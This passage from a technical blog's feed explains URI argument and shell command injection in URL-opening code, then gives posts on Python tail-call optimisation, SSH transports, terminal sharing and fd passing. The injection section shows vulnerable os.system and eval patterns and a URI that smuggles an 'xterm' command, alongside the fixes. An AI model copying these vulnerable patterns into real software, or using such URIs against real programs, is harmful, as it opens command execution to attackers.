
\n\n

Similar vulnerabilities

\n

Someone apparently took over the job of finding similar issues in other packages\nbecause a whole range of related CVEs have been registered at the same time\n(some of them are disputed, not all of them are valid):

\n\n

I'll look at some of them in a future episode.

\n

Analysis

\n

These vulnerabilities can be split into two classes.

\n

Argument injection

\n

Argument injection can happen when IFS characters present in the URI cause it\nto be expanded into multiple arguments.\nThis usually happens because of unquoted shell expansion\nof non-validated strings:

\n
my-command $some_untrusted_input\n
\n\n\n

IFS characters are not allowed in valid URIs, so if the URI\nwas already validated somehow by the caller this would not be an issue.\nAs we have seen, some callers might not properly validate the URI string.

\n

Shell command injection

\n

Shell command injection can happen when shell metacharacters\n($, <, >, ;, &, &&, |, ||, etc.) found in the URI\nare passed without proper escaping to the shell interpreter:

\n\n

A typical example would be (in Python):

\n
os.system(\"my-command \" + url)\n
\n\n\n

Or in shell:

\n
eval my-command \"$url\"\n
\n\n\n

In some cases, some escaping is done such as\nin gjots2:

\n
os.system(browser + \" '\" + url + \"' &\")\n
\n\n\n

However, this simple quoting is not enough because you can escape out of it\nusing single-quotes in the untrusted input. If you want to do that, you need\nto properly escape\nquotes and backslashes in the input as well:

\n
os.system(\"{} {} \".format(browser, shlex.quote(url)))\n
\n\n\n

Using system() is often a bad idea and you'd better use:

\n\n

For example, the previous example could be rewritten as:

\n
os.spawnvp(os.P_WAIT, browser, [browser, url])\n
\n\n\n

Some of the shell metacharacters (&, ;, etc.) can be present in valid URIs\n(eg. http://www.example.com/&xterm)\nso even a proper URI validation does not protect against those attacks.

\n

Related

\n"}, {"id": "http://www.gabriel.urdhr.fr/2018/03/19/sibling-tco-in-python/", "title": "Sibling Tail Call Optimization in Python", "url": "https://www.gabriel.urdhr.fr/2018/03/19/sibling-tco-in-python/", "date_published": "2018-03-19T00:00:00+01:00", "date_modified": "2018-03-19T00:00:00+01:00", "tags": ["computer", "python", "functional"], "content_html": "

In Tail Recursion In Python,\nChris Penner\nimplements (self) tail-call optimization (TCO) in Python using a function decorator.\nHere I'm extending the approach for sibling calls.

\n

Problem

\n

The example function is a functional-style factorial function defined with\ntail recursion as:

\n
def factorial(n, accumulator=1):\n    if n == 0:\n      return accumulator\n    else:\n      return factorial(n-1, accumulator * n)\n
\n\n\n

The Python interpreter does not implement tail-call optimization, so calling\nfactorial(2000) overflows the stack:

\n
\nTraceback (most recent call last):\n  File \"plain.py\", line 10, in \n    print(factorial(2000))\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\n  [..]\n  File \"plain.py\", line 8, in factorial\n    return factorial(n-1, accumulator * n)\nRuntimeError: maximum recursion depth exceeded\n
\n\n

Original Solution

\n

Chris Penner implements tail-call optimization using a function decorator\n(tail_recursive):

\n
# Normal recursion depth maxes out at 980, this one works indefinitely\n@tail_recursive\ndef factorial(n, accumulator=1):\n    if n == 0:\n        return accumulator\n    recurse(n-1, accumulator=accumulator*n)\n
\n\n\n

With the recurse function triggering the self tail-call\n(factorial calling itself).

\n

The implementation is:

\n
class Recurse(Exception):\n    def __init__(self, *args, **kwargs):\n        self.args = args\n        self.kwargs = kwargs\n\ndef recurse(*args, **kwargs):\n    raise Recurse(*args, **kwargs)\n\ndef tail_recursive(f):\n    def decorated(*args, **kwargs):\n        while True:\n            try:\n                return f(*args, **kwargs)\n            except Recurse as r:\n                args = r.args\n                kwargs = r.kwargs\n                continue\n    return decorated\n
\n\n\n

This works by wrapping the original factorial function.\nThe recurse function throws an exception which is caught by the wrapper\nfunction: the wrapper then calls the factorial function again with the new\narguments.

\n

Limitations

\n

One limitation of this approach is that it only allows self tail-calls\n(the function calls itself) but not sibling tail-calls (eg. function a calls\nfunction b and function b calls function a).
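The failure mode can be seen with a hypothetical mutual-recursion example (an is_even/is_odd parity check, names mine): recurse() carries no target function, so the trampoline always re-invokes the same decorated function, silently computing the wrong thing.

```python
# Sketch of the limitation, reusing the decorator from the article:
# recurse() has no way to name a sibling function, so the trampoline
# restarts the *same* decorated function every time.
class Recurse(Exception):
    def __init__(self, *args, **kwargs):
        self.args = args
        self.kwargs = kwargs

def recurse(*args, **kwargs):
    raise Recurse(*args, **kwargs)

def tail_recursive(f):
    def decorated(*args, **kwargs):
        while True:
            try:
                return f(*args, **kwargs)
            except Recurse as r:
                args = r.args
                kwargs = r.kwargs
    return decorated

@tail_recursive
def is_even(n):
    if n == 0:
        return True
    recurse(n - 1)  # meant as a tail-call to a sibling is_odd(n - 1)...

# ...but the trampoline re-runs is_even, so every n looks "even":
print(is_even(3))  # True (wrong: 3 is odd)
```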

\n

Sibling-call friendly version (without exceptions)

\n

Instead we could use something like this:

\n
from tco import tail_recursive, tail_call\n\n\n# Normal recursion depth maxes out at 980, this one works indefinitely\n@tail_recursive\ndef factorial(n, accumulator=1):\n    if n == 0:\n        return accumulator\n    return tail_call(factorial)(n-1, accumulator=accumulator*n)\n\n\nprint(factorial(2000))\n
\n\n\n

With the implementation:

\n
class TailCall:\n    def __init__(self, f, args, kwargs):\n        self.f = f\n        self.args = args\n        self.kwargs = kwargs\n\n\ndef tail_call(f):\n    def wrapper(*args, **kwargs):\n        return TailCall(f, args, kwargs)\n    return wrapper\n\n\ndef tail_recursive(f):\n    def wrapper(*args, **kwargs):\n        func = f\n        while True:\n            res = func(*args, **kwargs)\n            if not isinstance(res, TailCall):\n                return res\n            args = res.args\n            kwargs = res.kwargs\n            if hasattr(res.f, \"__tc_original__\"):\n                func = getattr(res.f, \"__tc_original__\")\n            else:\n                func = res.f\n    wrapper.__tc_original__ = f\n    return wrapper\n
\n\n\n

This implementation does not use exceptions so we need to return the\nTailCall value (otherwise nothing happens).

\n

With this approach, we can have sibling TCO:

\n
from tco import tail_recursive, tail_call\n\n\n@tail_recursive\ndef factorial(n, accumulator=1):\n    if n == 0:\n        return accumulator\n    return tail_call(factorial2)(n-1, accumulator=accumulator*n)\n\n\n@tail_recursive\ndef factorial2(n, accumulator=1):\n    if n == 0:\n        return accumulator\n    return tail_call(factorial)(n-1, accumulator=accumulator*n)\n\n\nprint(factorial(2000))\n
\n\n\n

I tend to like the exception-free approach better. It might make the\ntype system unhappy, however.

\n

Sibling-call friendly version (with exceptions)

\n

Here's the same thing with exceptions:

\n
class TailCall(BaseException):\n    def __init__(self, f, args, kwargs):\n        self.f = f\n        self.args = args\n        self.kwargs = kwargs\n\n\ndef tail_call(f):\n    def wrapper(*args, **kwargs):\n        raise TailCall(f, args, kwargs)\n    return wrapper\n\n\ndef tail_recursive(f):\n    def wrapper(*args, **kwargs):\n        func = f\n        while True:\n            try:\n                return func(*args, **kwargs)\n            except TailCall as e:\n                args = e.args\n                kwargs = e.kwargs\n                if hasattr(e.f, \"__tc_original__\"):\n                    func = getattr(e.f, \"__tc_original__\")\n                else:\n                    func = e.f\n    wrapper.__tc_original__ = f\n    return wrapper\n
\n\n\n

I'm deriving TailCall from BaseException instead of Exception because\nthe tail-recursive functions might catch Exception which would break the\nTCO mechanism.
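A minimal sketch of this rationale (illustrative class names, not the article's implementation): a marker exception derived from Exception can be swallowed by a broad handler inside user code, while a BaseException-derived one still reaches the trampoline.

```python
# Sketch (hypothetical names): a broad "except Exception" in user code
# swallows an Exception-based tail-call marker, but a BaseException-based
# marker propagates past it, so the trampoline still sees it.
class TailCallExc(Exception):
    pass

class TailCallBase(BaseException):
    pass

def user_code(marker):
    try:
        raise marker()
    except Exception:
        return "swallowed by user code"

try:
    result = user_code(TailCallBase)  # escapes the broad handler
except TailCallBase:
    result = "reached the trampoline"

print(user_code(TailCallExc))  # swallowed by user code
print(result)                  # reached the trampoline
```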

"}, {"id": "http://www.gabriel.urdhr.fr/2017/08/02/foo-over-ssh/", "title": "Foo over SSH", "url": "https://www.gabriel.urdhr.fr/2017/08/02/foo-over-ssh/", "date_published": "2017-08-02T00:00:00+02:00", "date_modified": "2017-08-02T00:00:00+02:00", "tags": ["computer", "network", "ssh", "unix"], "content_html": "

A comparison of the different solutions for using SSH2 as a secured\ntransport for protocols/services/applications.

\n

SSH-2 Protocol

\n

Overview

\n

The SSH-2 protocol uses its\nTransport Layer Protocol to provide\nencryption, confidentiality, server authentication and integrity over a\n(potentially) unsafe reliable bidirectional data stream (usually TCP port 22):

\n\n

Protocol stack:

\n
\n                                       [ session | forwarding ]\n[ SSH: Transport | SSH: Authentication | SSH: Connection      ]\n[ SSH: Binary Packet Protocol                                 ]\n[ SSH: Encryption                                             ]\n[ Underlying stream (eg. TCP)                                 ]\n
\n\n

Connection Protocol

\n

The Connection Protocol is used\nto manage channels\nand transfer data over them. Each channel is (roughly) a bidirectional\ndata stream:

\n\n

Multiple channels can be multiplexed over the same SSH connection:

\n
\nC \u2192 S CHANNEL_DATA(1, \"whoami\\n\")\nC \u2192 S CHANNEL_DATA(2, \"GET / HTTP/1.1\\r\\nHost: foo.example.com\\r\\n\\r\\n\")\nC \u2190 S CHANNEL_DATA(5, \"root\\n\")\nC \u2190 S CHANNEL_DATA(6, \"HTTP/1.1 200 OK\\r\\nContent-Type:text/plain\\r\\n\")\nC \u2190 S CHANNEL_DATA(6, \"Content-Length: 11\\r\\n\\r\\nHello World!\")\n
\n\n

Channels

\n

Session Channel

\n

A session channel is used to start:

\n\n

For session channels, the protocol has support for setting environment variables,\nallocating a server-side TTY, enabling X11 forwarding, notifying of the terminal\nsize modification (see SIGWINCH), sending signals, reporting the exit\nstatus or exit signal.

\n
\nC \u2192 S CHANNEL_OPEN(\"session\", 2, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(3, 6)\nC \u2192 S CHANNEL_REQUEST(6, \"pty-req\", TRUE, \"xterm\", 80, 120, \u2026)\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2192 S CHANNEL_REQUEST(6, \"env\", TRUE, \"LANG\", \"fr_FR.utf8\")\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2192 S CHANNEL_REQUEST(6, \"exec\", TRUE, \"ls /usr/\")\nC \u2190 S CHANNEL_SUCCESS(3)\nC \u2190 S CHANNEL_DATA(3, \"bin\\ngames\\ninclude\\nlib\\nlocal\\sbin\\nshare\\nsrc\\n\")\nC \u2190 S CHANNEL_EOF(3)\nC \u2190 S CHANNEL_REQUEST(3, \"exit-status\", FALSE, 0)\nC \u2190 S CHANNEL_CLOSE(3)\nC \u2192 S CHANNEL_CLOSE(6)\n
\n\n

Shell

\n

Shell session channels are used for interactive sessions and are not really\nuseful for protocol encapsulation.

\n

Commands

\n

In SSH, a command is a single string.\nThis is not an array of strings (argv).\nOn a UNIX-ish system, the command is usually expected to be called by the user's\nshell (\"$SHELL\" -c \"$command\"): variable expansion and globbing are applied\nby the server-side shell.

\n
ssh foo.example.com 'ls *'\nssh foo.example.com 'echo $LANG'\nssh foo.example.com 'while true; do uptime ; sleep 60 ; done'\n
\n\n\n
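This server-side behaviour can be illustrated locally (a sketch, run on the local machine rather than over SSH): the whole command is a single string handed to the shell with -c, so globbing and expansion happen in that shell, not in the caller.

```python
import os
import subprocess
import tempfile

# Local illustration of the "$SHELL" -c "$command" behaviour described
# above: the command is one string, and the shell we hand it to performs
# the glob expansion.
with tempfile.TemporaryDirectory() as d:
    for name in ("a.txt", "b.txt"):
        open(os.path.join(d, name), "w").close()
    out = subprocess.run(
        ["sh", "-c", "echo *"],  # like the server running: $SHELL -c 'echo *'
        cwd=d, capture_output=True, text=True,
    ).stdout.split()

print(out)  # ['a.txt', 'b.txt']
```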

Subsystems

\n

A subsystem is a \u201cwell-known\u201d service running on top of SSH. It is\nidentified by a string which makes it system independent: it does not\ndepend on the user/system shell, environment (PATH), etc.

\n

With the OpenSSH client, a subsystem can be invoked with\nssh -s $subsystem_name.

\n

Subsystem names come in\ntwo forms:

\n\n

Well-known subsystem names include:

\n\n

When using a subsystem:

\n\n

With the OpenSSH server, a command can be associated with a given\nsubsystem name with a configuration entry such as:

\n
Subsystem sftp /usr/lib/openssh/sftp-server\n
\n\n\n

The command is run under the identity of the user with its own shell\n(\"$SHELL\" -c \"$command\").

\n

If you want to connect to a socket you might use:

\n
Subsystem http socat STDIO TCP:localhost:80\nSubsystem hello@example.com socat STDIO UNIX:/var/run/hello\n
\n\n\n

It is possible to use exec to avoid keeping a shell process6:

\n
Subsystem http exec socat STDIO TCP:localhost:80\nSubsystem hello@example.com exec socat STDIO UNIX:/var/run/hello\n
\n\n\n

This works but OpenSSH complains because it checks for the existence of an\nexec executable file.

\n

Forwarding channels

\n

TCP/IP Forwarding

\n

The SSH protocol has support for forwarding (either incoming or outgoing)\nTCP connections.

\n

Local forwarding is used to forward a local connection (or any\nother local stream) to a remote TCP endpoint. A channel of type\ndirect-tcpip is opened to initiate a TCP connection on the remote\nside. This is used by ssh -L, ssh -W and ssh -D.

\n
\nC \u2192 S CHANNEL_OPEN(\"direct-tcpip\", chan, \u2026, \"foo.example.com\", 9000, \"\", 0);\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2, \u2026)\nC \u2192 S CHANNEL_DATA(chan2, \"aaa\")\n
\n\n

Remote forwarding is used to request to forward all incoming\nconnections on a remote port over the SSH connection. The remote side\nthen opens a new forwarded-tcpip channel for each connection. This\nis used by ssh -R.

\n
\nC \u2192 S      GLOBAL_REQUEST(\"tcpip-forward\", remote_addr, remote_port)\nC \u2190 S      REQUEST_SUCCESS(remote_port)\n    S \u2190 X  Incoming connection\nC \u2190 S      CHANNEL_OPEN(\"forwarded-tcpip\", chan, \u2026, address, port, peer_address, peer_port)\nC \u2192 S      CHANNEL_OPEN_CONFIRMATION(chan, chan2, \u2026)\n    S \u2190 X  TCP Payload \"aaa\"\nS \u2190 X      CHANNEL_DATA(chan2, \"aaa\")\n
\n\n

Unix socket forwarding

\n

Since OpenSSH 6.7, it is\npossible to involve (either local or remote) UNIX sockets in forwards\n(ssh -L, ssh -R, ssh -W):

\n

Client support is needed when the UNIX socket is on the client-side\nbut server-side support is not needed.

\n

When the UNIX socket is on the server-side, both client\nand server support is needed. This is using a protocol extension\nwhich works similarly to the TCP/IP forwarding:

\n\n

TUN/TAP Forwarding

\n

As an extension, OpenSSH has support for tunnel forwarding. A tunnel\ncan be either IP-based (TUN devices) or Ethernet-based (TAP devices).\nAs channels do not preserve message boundaries, a header is prepended\nto each message (IP packet or Ethernet frame respectively): this\nheader contains the message length (and for IP-based tunnels, the address family).

\n

This is used by ssh -w.

\n

Messages for an IP tunnel:

\n
\nC \u2192 S CHANNEL_OPEN(\"tun@openssh.com\", chan, \u2026, POINTOPOINT, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2)\nC \u2192 S CHANNEL_DATA(chan2, encapsulation + ip_packet)\n
\n\n

and the packets use the form:

\n
4B  packet length\n4B  address family (SSH_TUN_AF_INET or SSH_TUN_AF_INET6)\nvar data\n
\n\n\n

Messages for an Ethernet tunnel:

\n
\nC \u2192 S CHANNEL_OPEN(\"tun@openssh.com\", chan, \u2026, ETHERNET, \u2026)\nC \u2190 S CHANNEL_OPEN_CONFIRMATION(chan, chan2)\nC \u2192 S CHANNEL_DATA(chan2, encapsulation + ethernet_frame)\n
\n\n

and the packets use the form:

\n
4B  packet length\nvar data\n
\n\n\n
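The two framings above can be sketched in Python. This is a sketch under assumptions: the address-family constants are taken from OpenSSH (SSH_TUN_AF_INET = 2, SSH_TUN_AF_INET6 = 24, OpenBSD values), and the length field is assumed to count everything after itself.

```python
import struct

# Sketch of the tun@openssh.com message framing described above.
# Assumed constants (OpenSSH/OpenBSD values):
SSH_TUN_AF_INET = 2
SSH_TUN_AF_INET6 = 24

def encapsulate_ip(packet, af=SSH_TUN_AF_INET):
    # IP tunnel: 4B length, 4B address family, then the IP packet.
    body = struct.pack("!I", af) + packet
    return struct.pack("!I", len(body)) + body

def decapsulate_ip(message):
    (length,) = struct.unpack("!I", message[:4])
    (af,) = struct.unpack("!I", message[4:8])
    return af, message[8:8 + (length - 4)]

def encapsulate_ethernet(frame):
    # Ethernet tunnel: 4B length, then the raw frame (no AF word).
    return struct.pack("!I", len(frame)) + frame

framed = encapsulate_ip(b"\x45\x00...")  # stand-in for a real IP packet
print(decapsulate_ip(framed))
```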

X11 forwarding

\n

The x11 channel type is used for\nX11 forwarding.

\n

Examples of applications working over SSH

\n

SCP

\n

scp uses SSH to spawn a remote-side scp process. This remote scp\nprocess communicates with the local instance using its stdin and\nstdout.

\n

When the local scp sends data, it spawns:

\n
scp -t /some_path/\n
\n\n\n

When the local scp receives data, it spawns:

\n
scp -f /some_path/some_file\n
\n\n\n

rsync

\n

rsync can work over SSH. In this mode of operation, it uses SSH to\nspawn a server rsync process which communicates through its stdin and\nstdout.

\n

The local rsync spawns something like this on the remote side:

\n
rsync --server -e.Lsfx . /some_path/\n
\n\n\n

SFTP

\n

SFTP is a file transfer protocol.\nIt is expected to work on top of SSH\nusing the sftp subsystem. However, it can work on top of other streams\n(see sftp -S $program and sftp -D $program).

\n

This is not FTP running over SSH.

\n

FISH

\n

FISH\nis another solution for file system operations over a\nremote shell (such as rsh or ssh): it uses exec sessions to\nexecute standard UNIX commands on the remote side in order to do the\noperations. This first approach will not work if the remote side is\nnot a UNIXish system: in order to support non-UNIX systems, it\nencodes the same requests as special comments at the beginning of the\ncommand.

\n

Git

\n

Git spawns a remote git-upload-pack /some_repo/ which communicates\nwith the local instance using its standard I/O.

\n

Systemd

\n

Many systemd *ctl tools (hostnamectl, busctl, localectl,\ntimedatectl, loginctl, systemctl) have built-in support for\nconnecting to a remote host. They run ssh -xT $user@$host\nsystemd-stdio-bridge. This\ntool connects to the D-Bus\nsystem bus\n(i.e. ${DBUS_SYSTEM_BUS_ADDRESS:-/var/run/dbus/system_bus_socket}).

\n

Summary

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
ProgramSolution
scpCommand (scp)
rsyncCommand (rsync)
sftpSubsystem (sftp)
FISHCommands / special comments
gitCommand (git-upload-pack)
systemdCommand (systemd-stdio-bridge)
\n

Comparison of the different solutions for protocol transport

\n

Which solution should be used to export your own\nprotocol over SSH? The shell, X11 forwarding and TUN/TAP forwarding\nare not really relevant in this context so we're left with:

\n\n

Convenience

\n

Using a dedicated subsystem is the cleanest solution.\nThe subsystem feature of SSH was designed for this kind of application:\nit's supposed to hide implementation details such as the shell,\nPATH, whether the service is exposed as a socket or a command,\nthe location of the socket,\nwhether socat is installed on the system, etc.\nHowever, with OpenSSH, installing a new subsystem requires adding a new entry\nin the /etc/ssh/sshd_config file, which is not so convenient for packaging\nand not necessarily ideal for configuration management.\nAn Include directive was added for ssh_config\n(client configuration) in OpenSSH 7.3: the same directive for sshd_config\nwould probably be useful in this context.\nIn practice, the subsystem feature seems to be mostly used by sftp.

\n

Using a command is the simpler solution: the only requirement is to\nadd a suitable executable, preferably in the PATH. Moreover, the\nuser can add their own commands (or override the system ones) by adding\nexecutables to their own PATH.

\n

These two solutions have a few extra features which are not really\nnecessary when used as a pure stream transport protocol but might be\nhandy:

\n\n

The two forwarding solutions have fewer features which are more in\nline with what's expected of a stream transport but:

\n\n

Authentication and authorization

\n

The command and subsystem solutions run code with the user's identity\nand will by default run with the user permissions. The setuid and\nsetgid bits might be used if this is not suitable.

\n

Another solution is to use socat or netcat to connect to a socket and get\nthe same behavior as socket forwarding (security-wise).

\n

For Unix socket forwarding, OpenSSH uses the user identity to connect\nto the socket. The daemon can use SO_PEERCRED (on Linux, OpenBSD),\ngetpeereid()\n(on BSD),\ngetpeerucred()\n(Solaris) to get the user UID, GID in order to avoid a second\nauthentication. On Linux, file-system permissions can be used to\nrestrict the access to the socket as well.
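As a sketch of this mechanism (Linux-specific, using SO_PEERCRED; a socketpair stands in for an accepted Unix-socket connection):

```python
import os
import socket
import struct

# Linux sketch: a daemon reads the connecting peer's pid/uid/gid with
# SO_PEERCRED (struct ucred is three native ints), so it can authorize
# the user without a second authentication step.
server, client = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
ucred = server.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED,
                          struct.calcsize("3i"))
pid, uid, gid = struct.unpack("3i", ucred)
print(uid == os.getuid())  # True: both ends of the pair belong to us
```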

\n

For TCP socket forwarding, OpenSSH uses the user identity to connect to\nthe socket and ident (on localhost) might be used in order to get\nthe user identity but this solution is not very pretty.

\n

Conclusion

\n

I kind of like the subsystem feature even if it's not used that much.

\n

The addition of an Include directive in sshd_config might help deploying\nsuch services. Another interesting feature would be an option to associate a\nsubsystem with a Unix socket (without having to rely on socat).

\n

References

\n\n
\n
\n
    \n
  1. \n

    The receiver uses the\nSSH_MSG_CHANNEL_WINDOW_ADJUST\nmessage to request more data.\u00a0\u21a9

    \n
  2. \n
  3. \n

    The random padding is used to make the whole Binary Packet Protocol message\na multiple of the cipher block size (or 8 if the block size is smaller).\u00a0\u21a9

    \n
  4. \n
  5. \n

    This is used to transport both stdout (SSH_MSG_CHANNEL_DATA(channel, data))\nand stderr (SSH_MSG_CHANNEL_EXTENDED_DATA(channel, SSH_EXTENDED_DATA_STDERR, data))\nover the same session channel.\u00a0\u21a9

    \n
  6. \n
  7. \n

    Each channel is associated with two integer IDs, one for each side\nof the connection.\u00a0\u21a9

    \n
  8. \n
  9. \n

    It is currently not yet registered but it is described in the SFTP\ndrafts\nand widely deployed.\u00a0\u21a9

    \n
  10. \n
  11. \n

    bash already does an implicit exec when bash -c\n\"$a_single_command\" is used.\u00a0\u21a9

    \n
  12. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2016/10/18/terminal-sharing/", "title": "Terminal read-only live sharing", "url": "https://www.gabriel.urdhr.fr/2016/10/18/terminal-sharing/", "date_published": "2016-10-18T00:00:00+02:00", "date_modified": "2017-05-06T00:00:00+02:00", "tags": ["computer", "unix", "ssh", "screen"], "content_html": "

Live sharing a terminal session to another (shared) host over SSH in\nread-only mode.

\n

Update: 2017-05-06 add broadcasting over the web with\nnode-webterm

\n

TLDR

\n
#!/bin/sh\n\nhost=\"$1\"\n\nfile=script.log\ntouch \"$file\"\ntail -f $file | ssh $host 'cat > script.log' &\nscript -f \"$file\"\nkill %1\nssh $host \"rm $file\"\nrm \"$file\"\n
\n\n\n

Using screen

\n

screen can save the content of the screen session on a file. This is\nenabled with the following screen commands:

\n
logfile screen.log\nlogfile flush 0\nlog on\n
\n\n\n

The logfile flush 0 command removes the buffering delay in screen\nin order to reduce the latency.

\n

We can watch the session locally (from another terminal) with:

\n
tail -f screen.log\n
\n\n\n

This might produce some garbage if the original and target terminals are not\ncompatible (echo $TERM is different) or if the terminal sizes are different:

\n\n

Instead of watching it locally, we want to send the content to another (shared)\nhost over SSH:

\n
tail -f screen.log | ssh $server 'cat > /tmp/logfile'\n
\n\n\n

Other users can now watch the session on the remote host with:

\n
tail -f /tmp/logfile\n
\n\n\n

Using xterm

\n

You can create a log file from xterm:

\n
xterm -l -lf xterm.log\n
\n\n\n

The rest of the technique applies the same.

\n

Best viewed from an xterm-compatible terminal.

\n

Using script

\n

script can be used to create a log file as well:

\n
script -f script.log\n
\n\n\n

Downsides

\n

The downside is that a log file is created on both the local and server side.\nThis file might grow (especially if you broadcast\nnyancat \"\ud83d\ude38\" for a long time)\nand needs to be cleaned up afterwards.

\n

A FIFO might be used instead of a log file with some programs. It\nworks with screen and script but not with xterm. However, I\nexperienced quite a few broken pipes (and associated brokenness) when\ntrying to use this method. Moreover, using a FIFO can probably stall\nsome terminals if the consumer does not consume the data fast enough.

\n

Broadcast service

\n

In order to avoid the remote log file, a solution is to setup a terminal\nbroadcast service. A local terminal broadcast service can be set up with:

\n
socat UNIX-LISTEN:script.socket,fork SYSTEM:'tail -f script.log'\n
\n\n\n

And we can watch it with:

\n
socat STDIO UNIX-CONNECT:script.socket\n
\n\n\n

We can expose this service to a remote host over SSH:

\n
ssh $server -R script.socket:script.socket -N\n
\n\n\n

The downside of this approach is that the content is transferred over\nSSH once per viewer instead of only once.

\n

Web broadcast

\n

node-webterm can be used to\nbroadcast the log over HTTP:

\n
{\n    \"login\": \"tail -f script.log\",\n    \"port\": 3000,\n    \"interface\": \"127.0.0.1\",\n    \"input\": true\n}\n
\n\n\n

This displays the terminal in the browser using\nterminal.js, a JavaScript\nxterm-compatible terminal emulator (executing client-side).\nThe default terminal size is the same as the default xterm size.\nIt can be configured in index.html.

"}, {"id": "http://www.gabriel.urdhr.fr/2016/08/07/openssh-proxyusefdpass/", "title": "OpenSSH ProxyUseFdPass", "url": "https://www.gabriel.urdhr.fr/2016/08/07/openssh-proxyusefdpass/", "date_published": "2016-08-07T00:00:00+02:00", "date_modified": "2016-08-07T00:00:00+02:00", "tags": ["computer", "network", "system", "ssh", "python"], "content_html": "

While looking at the OpenSSH ssh_config manpage, I found the\nProxyUseFdpass configuration I did not know about. It's apparently\nnot widely known or used.

\n

Update 2017-08-02: netcat (nc) has an option to pass the created\ndescriptor using fdpass. In addition to the straightforward connect(),\nit can pass a file descriptor after initiating a connection through a SOCKS\nproxy (with -x proxy.example.com) or with HTTP CONNECT\n(-x proxy.example.com -X connect).

\n

ProxyCommand

\n

The OpenSSH client has a ProxyCommand configuration option which can be\nused to run a command as a transport to the server:

\n
\n

Specifies the command to use to connect to the server. The command\nstring extends to the end of the line, and is executed using the\nuser's shell \u2018exec\u2019 directive to avoid a lingering shell process.

\n
\n

Instead of opening a socket to the server itself, the OpenSSH client\nspawns the specified command and uses its standard input and output to\ncommunicate with the server.

\n

The man page suggests using (the OpenBSD variant of) netcat to connect\nthrough an HTTP (or SOCKS) proxy:

\n
\nProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p\n
\n\n

A typical usage is to use a relay/bastion/jump/gateway1 SSH\nserver with ssh -W2:

\n
\nHost gateway.example.com\nProxyCommand none\n\nHost *.example.com\nProxyCommand ssh gateway.example.com -W %h:%p\n
\n\n

ProxyUseFdPass

\n

While looking at the new ProxyJump configuration1, I found a\nProxyUseFdpass option which:

\n
\n

Specifies that ProxyCommand will pass a connected file descriptor\nback to ssh(1) instead of continuing to execute and pass data. The\ndefault is \u201cno\u201d.

\n
\n

When enabled, instead of communicating with the server through the\nProxyCommand standard input and output, the SSH client expects the\ncommand to give it a file descriptor to use. The idea is to avoid\nan unnecessary lingering process and extra writes/reads3.

\n

The documentation does not explain how it's supposed to work exactly\nand I did not find any working example or any suggestion of a program\nwhich would be able to pass the file descriptor.

\n

The spawned command is expected to:

\n
    \n
  1. \n

    setup a file descriptor;

    \n
  2. \n
  3. \n

send it to the client over its standard output (sendmsg with\n SCM_RIGHTS) with a one-byte message;

    \n
  4. \n
  5. \n

    exit(0).

    \n
  6. \n
\n

A minimal program which does the job is:

\n
#!/usr/bin/env python3\n\nimport sys\nimport socket\nimport array\n\n# Create the file descriptor:\ns = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0)\ns.connect((sys.argv[1], int(sys.argv[2])))\n\n# Pass the file descriptor:\nfds = array.array(\"i\", [s.fileno()])\nancdata = [(socket.SOL_SOCKET, socket.SCM_RIGHTS, fds)]\nsocket.socket(fileno = 1).sendmsg([b'\\0'], ancdata)\n
\n\n\n

Which can be used with:

\n
\nProxyCommand /path/to/passfd %h %p\nProxyUseFdpass yes\n
\n\n

It does not do much: it creates a socket the same way the OpenSSH client\nwould have and passes it to the OpenSSH client. However, it can be\nextended in order to do things such as:

\n\n

For testing purpose this receiving program can be used:

\n
#!/usr/bin/env python3\n\nimport os\nimport sys\nimport socket\nimport array\n\n(a, b) = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM, 0)\npid = os.fork()\n\ndef recv_fd(sock):\n    fds = array.array(\"i\")\n    cmsg_len = socket.CMSG_LEN(fds.itemsize)\n    msg, ancdata, flags, addr = sock.recvmsg(1, cmsg_len)\n    for cmsg_level, cmsg_type, cmsg_data in ancdata:\n        if (cmsg_level, cmsg_type) == (socket.SOL_SOCKET, socket.SCM_RIGHTS):\n            fds.frombytes(cmsg_data)\n            return fds[0]\n    sys.exit(1)\n\nif pid == 0:\n    # Exec specified command in the child:\n    a.close()\n    os.dup2(b.fileno(), 0)\n    os.dup2(b.fileno(), 1)\n    b.close()\n    os.execvp(sys.argv[1], sys.argv[1:])\nelse:\n    # Receive file descriptor and wait in the parent:\n    b.close()\n    s = recv_fd(a)\n    os.waitpid(pid, 0)\n    print(s)\n
\n\n\n

Which can be used as:

\n
fdrecv fdpass localhost 80\n
\n\n\n
\n
\n
    \n
  1. \n

    OpenSSH 7.3 includes\nspecial support for SSH jump servers with the ProxyJump\nconfiguration and -J flag.\u00a0\u21a9\u21a9

    \n
  2. \n
  3. \n

    It's often suggested to use this configuration instead:

    \n

    \nProxyCommand ssh gateway.example.com nc %h %p\n
    \n

    This requires netcat to be available on the server. ssh -W only\nneeds client-side support which is available in OpenSSH since\n5.4 (released in 2010)\nand the SSH server to accept TCP forwarding.\u00a0\u21a9

    \n
  4. \n
  5. \n

    It is not usable for an SSH jump server but can be used in\n simpler cases.\u00a0\u21a9

    \n
  6. \n
\n
"}, {"id": "http://www.gabriel.urdhr.fr/2016/08/01/simgrid-synchronisation/", "title": "C++ synchronisations for SimGrid", "url": "https://www.gabriel.urdhr.fr/2016/08/01/simgrid-synchronisation/", "date_published": "2016-08-01T00:00:00+02:00", "date_modified": "2016-08-01T00:00:00+02:00", "tags": ["computer", "simgrid", "c++", "future"], "content_html": "

